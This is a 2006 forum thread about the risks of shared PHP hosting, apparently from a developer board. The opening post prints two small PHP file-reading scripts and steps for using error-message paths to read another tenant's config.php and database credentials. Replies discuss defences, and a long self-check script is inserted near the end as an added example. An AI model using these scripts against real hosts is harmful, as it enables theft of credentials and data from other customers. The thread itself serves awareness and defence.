Security in shared web servers! be careful: everybody hack

Posted: Sun Jul 16, 2006 5:57 am
by sanbad
Hi

If your PHP portal is installed on a shared server you must be careful.
Another user resident on your server (he has a hosting account on your server) can hack your portal!

How can he hack your portal?

By this script (script 1):

<?php
if (isset($a)) {
    echo implode("", file("$a"));
}
?>
And by another one (script 2):

<?php
header('Content-Type: text/plain');
readfile($_GET['a']);
?>
By these scripts, a user resident on your server can get your files or your code; for example he can get your config.php, see your database user & password & name and download your data!!!

1- The hacker must know your ID on your hosting, so he calls one of the PHP files that belong to your portal in his browser:
for example:

http://www.yourwebsite.com/forum/includes/functions.php?anyfunctionIntegerArgument=text
after this request, he sees an error report like this:

/home/yourID/public_html/forum/includes/functions.php  error 607 in line 563
Now he finds your ID

2- Now he uses one of these scripts, for example script 1, like in this case:

http://www.hackerWebsite.com/script1.php?a=/home/yourID/public_html/forum/config.php
then he views the page source and reads your DB config information!

3- By using a simple script he can download your DB or write into your DB and …
he can install the same portal, edit and change some code, then use your encrypted admin password to log in sometimes and…

How can we solve this problem?

1- We must add this code to the prologue of all PHP files:

// hide error messages from visitors and write them to the server error log instead
ini_set('display_errors', 'Off');
ini_set('log_errors', 'On');
so the hacker cannot find your ID. And you can see the error log in the cPanel of your Linux hosting.

2- You must rename your config.php file and edit all PHP files which include or require config.php. Then you must encrypt these files using Zend PHP Encoder or any other encoder program.
So if a hacker finds your ID he will not find your DB config file.

3- Or use a dedicated server only for yourself.


In PHP-Nuke, if NukeSentinel is used and IP-tracker is on, then all users' usernames and passwords (even admin's) are inserted into nuke_nsnst_tracked_ips!!!

So the Nuke owner or a hacker can see users' passwords.

If you want to register on portals you must use a different password.
If your password is the same as for your other important things, for example your email password or domain panel password or your bank account, a hacker or the Nuke website owner can access that!

In other portals, the owner can change the scripts' code and find your password.

Posted: Sun Jul 16, 2006 6:50 am
by MarK (CZ)
I don't think that other accounts on the same server have rights to access my folders.
Maybe on some badly supervised servers.

Posted: Sun Jul 16, 2006 6:51 am
by AshrakTheWhite
you could just hash your password

Re: Security in shared web servers! be careful: everybody ha

Posted: Sun Jul 16, 2006 7:53 am
by aerodromoi
sanbad wrote:Hi

If your PHP portal is installed on a shared server you must be careful.
Another user resident on your server (he has a hosting account on your server) can hack your portal!

How can he hack your portal?

By this script (script 1):

<?php
if (isset($a)) {
    echo implode("", file("$a"));
}
?>
And by another one (script 2):

<?php
header('Content-Type: text/plain');
readfile($_GET['a']);
?>
[...]
3- Or use a dedicated server only for yourself.
Why would anybody in his or her right mind allow snippets like the ones you've posted?
Shared hosting is always a compromise, but you have to validate user input nevertheless.

btw: As to your first script - you might want to take a look at http://de2.php.net/manual/en/ini.core.p ... er-globals.

Posted: Sun Jul 16, 2006 9:24 am
by Chris Corbyn
It's been a known problem for some time. Hosts who know what they're doing should use CGI and suexec in order to get PHP running under the userid of the account holder; this way you can remove the "x" execute permission from /home/<yourname> for everybody except yourself.

It would probably be a good measure to CHMOD all your files to remove all permissions for everybody except yourself too, if you are in a CGI/suexec setup.

I'm more than aware that some shared hosts could care less about such issues, after having my own website filled with trojan code on a number of occasions before telling my company to get stuffed and getting a VDS instead :)

Posted: Sun Jul 16, 2006 9:25 am
by Chris Corbyn
AshrakTheWhite wrote:you could just hash your password
That won't stop people getting your MySQL details. Even if you hashed that you'd have to use the hash to login so all it means is your password is the hash so it can still be stolen.

Posted: Mon Jul 17, 2006 7:42 am
by phppage
Ok, heard rumours about this but this is a worry. Would anyone have any further detailed documents regarding protecting sites from this? Would this be a worry on bluehost.com? Any penetration tests I could try without upsetting my hosting provider?

Posted: Mon Jul 17, 2006 8:18 am
by Chris Corbyn
phppage wrote:Ok, heard rumours about this but this is a worry. Would anyone have any further detailed documents regarding protecting sites from this? Would this be a worry on bluehost.com? Any penetration tests I could try without upsetting my hosting provider?
Just check if PHP is running under your own userid:

<?php
// prints the USER environment variable of the process running PHP (empty if the server does not set it)
echo `echo \$USER`;
?>

Posted: Mon Jul 17, 2006 8:21 am
by Benjamin
I was playing around on a shared host the other day actually in ssh.

#>updatedb
#>locate [censored] | less
etc. etc..

I notified the admin, not sure they will do anything about it though.

Posted: Mon Jul 17, 2006 12:45 pm
by phppage
d11wtq wrote:
phppage wrote:Ok, heard rumours about this but this is a worry. Would anyone have any further detailed documents regarding protecting sites from this? Would this be a worry on bluehost.com? Any penetration tests I could try without upsetting my hosting provider?
Just check if PHP is running under your own userid:

<?php
// prints the USER environment variable of the process running PHP (empty if the server does not set it)
echo `echo \$USER`;
?>
I tried that, uploaded it to my website and ran it via a browser, and it displayed nothing. What would that mean?

Posted: Mon Jul 17, 2006 12:48 pm
by phppage
I get this when I try to access SSH:
SSH/Shell Access

For security reasons, shell access is not enabled by default. In order to activate shell access on your account, you will need to fax or mail a copy of your driver's license, passport or other photo id to customer service. You can fax it to +1 (801) 765-1992 or email it to support@bluehost.com
I guess that's encouraging.

Posted: Mon Jul 17, 2006 4:10 pm
by Chris Corbyn
Hmm... you can create a file using PHP, then FTP to the server and look who owns that file (i.e. "nobody" or "www" vs "<your name>").
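A more complete version of that check, written as an added example for this thread (not code from any of the posts): it reports the uid PHP runs as, confirms it with the create-a-file-and-read-its-owner trick suggested above when the posix extension is missing, and then checks the home-directory permissions, config.php mode and display_errors points raised earlier in the thread. It assumes the usual /home/<you>/public_html layout and that the portal's config.php sits next to this script; upload it to your own account, run it once, and delete it.

```php
<?php
// Added example for this thread, not from any post. Self-check for a shared host:
// who does PHP run as, and do file modes actually protect your files from other tenants?
header('Content-Type: text/plain');

// 1. Effective uid of the PHP process. posix_geteuid() is exact; if the posix
//    extension is missing, fall back to creating a file and reading its owner.
if (function_exists('posix_geteuid')) {
    $euid = posix_geteuid();
} else {
    $probe = tempnam(__DIR__, 'uidcheck');
    $euid  = fileowner($probe);
    unlink($probe);
}
$scriptOwner = fileowner(__FILE__);
$euidName = '?';
if (function_exists('posix_getpwuid') && ($pw = posix_getpwuid($euid))) {
    $euidName = $pw['name'];
}
printf("PHP runs as uid %d (%s); this script is owned by uid %d\n", $euid, $euidName, $scriptOwner);
if ($euid === $scriptOwner) {
    echo "OK: PHP runs under your own uid (CGI/suexec style), so chmod can keep other tenants out.\n";
} else {
    echo "WARNING: PHP runs as a shared uid; any tenant's script can read whatever that uid can read.\n";
}

// 2. Can other users traverse your home directory? (assumption: docroot is /home/<you>/public_html)
$home = dirname($_SERVER['DOCUMENT_ROOT'] ?? __DIR__);
$mode = fileperms($home) & 0777;
printf("%s mode %04o: %s\n", $home, $mode,
    ($mode & 0011) ? 'group/other can traverse it (x set), consider chmod 700' : 'group/other blocked');

// 3. Is the DB config readable by anyone but you? (assumption: config.php next to this script)
$cfg = __DIR__ . '/config.php';
if (is_file($cfg)) {
    $cmode = fileperms($cfg) & 0777;
    printf("config.php mode %04o: %s\n", $cmode,
        ($cmode & 0044) ? 'readable by group/other' : 'readable by owner only');
}

// 4. Are full paths hidden from visitors? (sanbad's step 1: display_errors off, log_errors on)
$display = filter_var(ini_get('display_errors'), FILTER_VALIDATE_BOOLEAN);
$log     = filter_var(ini_get('log_errors'), FILTER_VALIDATE_BOOLEAN);
printf("display_errors=%s log_errors=%s%s\n", $display ? 'on' : 'off', $log ? 'on' : 'off',
    $display ? ' -- error messages leak /home/<id>/... paths to visitors' : '');
```

If step 1 reports a shared uid, the chmod advice in this thread cannot protect you, because the web server user, not you, is the one reading the files; that is the case to raise with the host.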

Posted: Mon Jul 17, 2006 5:49 pm
by phppage
I tend to see that Owner, Group and All Users all have read access, but only the owner has write access, and nothing is selected for execute. However the owner is not defined?? This is using Windows' standard FTP via Network Places. Could I get more info, do you think, from a good FTP client?

Posted: Wed Jul 19, 2006 5:45 pm
by phppage
Seems like I am covered. Thanks for your help though. Weight off my mind.

http://www.bluehostforum.com/showthread.php?t=1551

Posted: Wed Jul 19, 2006 5:53 pm
by RobertGonzalez
I am pretty sure that iPowerweb is still vulnerable to this. One of my clients got zapped a few weeks ago. I had gotten hit several times before moving away from them.